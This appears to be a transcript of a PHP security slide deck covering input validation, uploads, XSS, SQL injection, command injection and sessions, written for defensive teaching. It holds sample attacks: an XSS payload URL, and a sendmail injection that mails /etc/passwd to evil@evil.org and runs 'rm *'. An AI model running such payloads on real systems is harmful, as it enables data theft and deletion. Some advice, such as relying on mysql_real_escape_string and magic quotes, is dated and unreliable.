PHP security
Uploaded by uttam-kumar. Category: Technology
Transcript of PHP security

What is Security?
• measurement…
• safety…
• protection…
Secure Web Applications
• Web security issues have to do with:
  – hacker attacks
    • denial of service
    • server hijacking
  – common threats
  – compromise of data

PHP & Security
• a growing language…
• a major concern…
Never trust the web…
• Input data validation
  – register_globals = OFF
  – $_REQUEST[]: a big NO NO…
  – Type cast input data
    • Do not rely on is_numeric() to check numeric data (locale problem)
    • Use a regular expression if the data is a string
• Path validation
  – Always use basename()
Never trust the web…
• Content size validation
  – Use server-side max-length validation
• File upload
  – Check the destination file size with $_FILES['name']['size']
  – I think the browser MIME header is reliable, right? (It is client-supplied, so it is not.)
  – Use getimagesize() in the case of an image
• External source upload, like an avatar
  – Make a local copy if a path/of/file is submitted from a URL.
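An added example, not from the slides, that applies the upload checks above in one handler. It assumes a form field named "avatar", an upload directory /var/www/uploads that the web server does not execute PHP from, and PHP 7 or newer.

```php
<?php
// Added example (not from the original slides). Assumed: form field "avatar",
// upload directory below exists and is not served as executable PHP, PHP >= 7.
const UPLOAD_DIR = '/var/www/uploads';
const MAX_BYTES  = 512 * 1024;                                   // server-side size limit
const ALLOWED    = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg']; // whitelist of image types

function store_avatar(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Size: enforce the limit on the server; a MAX_FILE_SIZE form field is only a hint.
    if ($file['size'] > MAX_BYTES || filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type: ignore $file['type'] (sent by the browser); inspect the bytes instead.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED[$info[2]])) {
        throw new RuntimeException('not an allowed image');
    }
    // Name: basename() strips any directory part, a whitelist regex drops everything
    // else, and the extension comes from the detected type, not from the client.
    $base = preg_replace('/[^A-Za-z0-9_-]/', '',
                         pathinfo(basename($file['name']), PATHINFO_FILENAME));
    if ($base === '') {
        $base = 'avatar';
    }
    $dest = UPLOAD_DIR . '/' . substr($base, 0, 64) . '_'
          . bin2hex(random_bytes(8)) . '.' . ALLOWED[$info[2]];
    // Only accept a file that was really uploaded in this request.
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

if (isset($_FILES['avatar'])) {
    try {
        echo 'stored as ' . htmlentities(store_avatar($_FILES['avatar']), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlentities($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```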
XSS attack
• Can lead to:
  – embarrassment
  – session take-over
  – password theft
  – user tracking by 3rd parties
XSS attack
• Prevention is better than cure
  – Use strip_tags()
    • No tag allowance, please
  – Use htmlentities()
  – Is $_SERVER safe?
    • It can be set by the request…
    • Request: php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
    • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo
    • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
  – IP based info
    • Use HTTP_X_FORWARDED_FOR
    • Use long2ip()
      // X-Forwarded-For is a comma-separated list written by the client and by proxies;
      // only trust it when the request came through a proxy you control.
      $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
      // take the last entry, trim the space after the comma, and normalise it through ip2long()/long2ip()
      $sValidIp = long2ip(ip2long(trim(array_pop($aIp))));
SQL Injection
• Arbitrary query execution
• Removal of data.
• Modification of existing values.
• Denial of service.
• Arbitrary data injection.

Preventing SQL injection
• Are magic quotes enough?
  – Use mysql_real_escape_string()
  – Use prepared statements
  – Avoid omitting single quotes
  – LIKE quandary: needs addslashes()
  – Avoid printing the query
  – Authentication data storage
    • Encrypt sensitive data used to access the database
    • Make sure it's only loaded for certain VirtualHosts
Authentication Data Storage
/home/illa/sql.conf (Apache server configuration):
  SetEnv DB_LOGIN "login"
  SetEnv DB_PASSWD "password"
  SetEnv DB_HOST "127.0.0.7"
Apache virtual host (only this host loads the file):
  <VirtualHost iila.ws>
    Include /home/illa/sql.conf
  </VirtualHost>
PHP file:
  $_SERVER['DB_LOGIN']
  $_SERVER['DB_PASSWD']
A better approach is to set these things under PHP's ini directives, using php_admin_value:
  php_admin_value mysql.default_user "login"
Preventing code injection
• Path validation
  – Validate the file name
      $sFile = "D\\'sozaRes.doc";  // the string D\'sozaRes.doc, which contains a backslash
      basename($sFile); // returns D\'sozaRes.doc on a *nix system
      basename($sFile); // returns 'sozaRes.doc on win32, where the backslash is a directory separator
    • Remove slashes
    • Keep a white list of file names
    • Use the full path
• Avoid variables in eval()
• Avoid using variables passed by users in regular expressions.
Command injection
• Use escapeshellcmd() and escapeshellarg()
• Use the full path for the command
• Set priority and memory limit for the command
    // -t caps CPU seconds, -m the resident set size in KB, for the command that follows
    shell_exec("ulimit -t 20 -m 20000; /usr/bin/php test.php");
Calling External Programs
  <?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>
The user could control $to to yield:
  http://examp.com/send.php?to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A
which would result in running the command:
  /usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
A solution would be:
  $fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
Securing sessions
• Weakness of sessions
  – Server-side weakness…
    • ls -l /tmp/sess_*   # can reveal session info
  – URL session exploitation
• Solution
  – Native protection.
  – Mixing security and convenience.
  – Securing the session storage path
  – Check the browser signature
  – Referrer validation
Questions…????
Thank You !!